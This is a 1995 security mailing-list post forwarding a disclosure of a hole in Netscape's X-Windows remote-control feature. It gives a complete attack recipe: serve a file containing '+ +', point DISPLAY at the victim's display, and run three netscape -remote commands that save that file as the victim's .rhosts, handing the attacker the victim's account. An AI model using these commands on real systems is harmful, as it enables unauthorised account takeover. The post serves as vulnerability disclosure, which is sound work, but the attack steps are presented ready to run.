[prev in list] [next in list] [prev in thread] [next in thread] 

List:       best-of-security
Subject:    BoS: netscape/X remote control exploit
From:       Julian Assange <proff () suburbia ! net>
Date:       1995-10-01 6:31:19
[Download RAW message or body]

SOURCE: comp.security.unix
RE: Netscape remote control mechanism for X based clients.

* There's a huge hole in the Netscape remote control mechanism for the
* X-Windows based clients.
* Potential impact : anybody can become any user that uses Netscape on any
* system without sufficient X security.

* Let's suppose that you have an account on a target machine, where somebody
* is using Netscape, and either the xhost checking is disabled, or you can
* set the xhost yourself (e.g. if you have an account and the target user has
* no .Xauthority, as is frequent in university computer rooms).
* Then you can gain access to the target user's account using the following
* steps :

* - make a text file containing only "+ +" accessible (as file, as URL, or
*   whatever you like) to the target Netscape client. This is quite easy, either
*   if you have a personal WWW page (http://... URL) or an account on the
*   target machine (file://... URL), or even by uploading it to an anon FTP

* - set your DISPLAY environment variable to the target display

* - run the following set of commands :

*   netscape -noraise -remote "openURL(<put-your-URL-here>)"
*   netscape -noraise -remote "saveAs(.rhosts)"
*   netscape -noraise -remote back

* In the second command, the path should be specified whenever possible
* (~ is not accepted).

* If the target user does not already have a .rhosts and is not looking at that
* precise moment, then the chances are it worked !

[prev in list] [next in list] [prev in thread] [next in thread]